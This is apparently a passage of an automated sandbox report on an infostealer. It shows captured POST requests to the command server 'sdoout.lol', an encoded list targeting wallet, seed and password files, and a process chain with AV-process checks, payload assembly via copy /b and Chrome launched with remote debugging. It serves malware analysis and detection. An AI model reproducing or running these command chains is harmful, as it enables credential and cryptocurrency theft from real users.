                                                                                                                                                                                                                                                                                            2024-12-31 15:59:36 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                                            Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            42192.168.2.564429116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:37 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----sriwlnycjm79zmglf379
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 453
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:37 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 73 72 69 77 6c 6e 79 63 6a 6d 37 39 7a 6d 67 6c 66 33 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 73 72 69 77 6c 6e 79 63 6a 6d 37 39 7a 6d 67 6c 66 33 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 73 72 69 77 6c 6e 79 63 6a 6d 37 39 7a 6d 67 6c 66 33 37 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------sriwlnycjm79zmglf379Content-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------sriwlnycjm79zmglf379Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------sriwlnycjm79zmglf379Cont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:37 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            43192.168.2.564436116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:41 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----h4euaimgdjeknyus2vs2
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 68 34 65 75 61 69 6d 67 64 6a 65 6b 6e 79 75 73 32 76 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 68 34 65 75 61 69 6d 67 64 6a 65 6b 6e 79 75 73 32 76 73 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 68 34 65 75 61 69 6d 67 64 6a 65 6b 6e 79 75 73 32 76 73 32 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------h4euaimgdjeknyus2vs2Content-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------h4euaimgdjeknyus2vs2Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------h4euaimgdjeknyus2vs2Cont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:41 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            44192.168.2.564439116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:42 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----t0hlny5f3ohdbaa16xtj
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:42 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 74 30 68 6c 6e 79 35 66 33 6f 68 64 62 61 61 31 36 78 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 74 30 68 6c 6e 79 35 66 33 6f 68 64 62 61 61 31 36 78 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 74 30 68 6c 6e 79 35 66 33 6f 68 64 62 61 61 31 36 78 74 6a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------t0hlny5f3ohdbaa16xtjContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------t0hlny5f3ohdbaa16xtjContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------t0hlny5f3ohdbaa16xtjCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:43 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                            Behavior

                                                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                                                            Start time:10:58:06
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\over.ps1"
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                                                            Start time:10:58:06
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                                                                            Start time:10:58:13
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2xn2zg1\l2xn2zg1.cmdline"
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7b6b20000
                                                                                                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:moderate
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:4
                                                                                                                                                                                                                                                                                            Start time:10:58:15
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES27E7.tmp" "c:\Users\user\AppData\Local\Temp\l2xn2zg1\CSC17118CCF1564C5291822499255B405E.TMP"
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff7f3ce0000
                                                                                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:5
                                                                                                                                                                                                                                                                                            Start time:10:58:15
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\hyf04rot.rhn.exe"
                                                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                                                            File size:1'171'058 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:39798D9BFF4607F95DF260FF89C564C0
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                            • Detection: 24%, ReversingLabs
                                                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:6
                                                                                                                                                                                                                                                                                            Start time:10:58:17
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c move Expertise Expertise.cmd & Expertise.cmd
                                                                                                                                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:7
                                                                                                                                                                                                                                                                                            Start time:10:58:17
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:8
                                                                                                                                                                                                                                                                                            Start time:10:58:18
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                                                                            Imagebase:0xde0000
                                                                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:9
                                                                                                                                                                                                                                                                                            Start time:10:58:18
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                            Imagebase:0xa40000
                                                                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                                                                            Start time:10:58:19
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                                                                            Imagebase:0xde0000
                                                                                                                                                                                                                                                                                            File size:79'360 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:11
                                                                                                                                                                                                                                                                                            Start time:10:58:19
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                            Imagebase:0xa40000
                                                                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                                                                                                            Start time:10:58:19
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:cmd /c md 164676
                                                                                                                                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                                                                                                            Start time:10:58:20
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:extrac32 /Y /E Grab
                                                                                                                                                                                                                                                                                            Imagebase:0x9a0000
                                                                                                                                                                                                                                                                                            File size:29'184 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:14
                                                                                                                                                                                                                                                                                            Start time:10:58:20
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:findstr /V "slovenia" Contractors
                                                                                                                                                                                                                                                                                            Imagebase:0xa40000
                                                                                                                                                                                                                                                                                            File size:29'696 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                                                                                                            Start time:10:58:20
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:cmd /c copy /b 164676\Stopped.com + Zero + Refugees + Severe + Removal + Differential + Mph + Increasingly + Born + Convinced + Passenger 164676\Stopped.com
                                                                                                                                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:16
                                                                                                                                                                                                                                                                                            Start time:10:58:20
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:cmd /c copy /b ..\Furnished + ..\Relative + ..\Calgary + ..\Pour + ..\Halfcom + ..\Nj + ..\Capitol + ..\Firewire + ..\Trees h
                                                                                                                                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                                                                                                            Start time:10:58:20
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:Stopped.com h
                                                                                                                                                                                                                                                                                            Imagebase:0x380000
                                                                                                                                                                                                                                                                                            File size:947'288 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                                                            Start time:10:58:21
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                            Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                                            Imagebase:0x200000
                                                                                                                                                                                                                                                                                            File size:28'160 bytes
                                                                                                                                                                                                                                                                                            MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                                                            Start time:10:58:51
                                                                                                                                                                                                                                                                                            Start date:31/12/2024
                                                                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                            Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                            File size:3'242'272 bytes
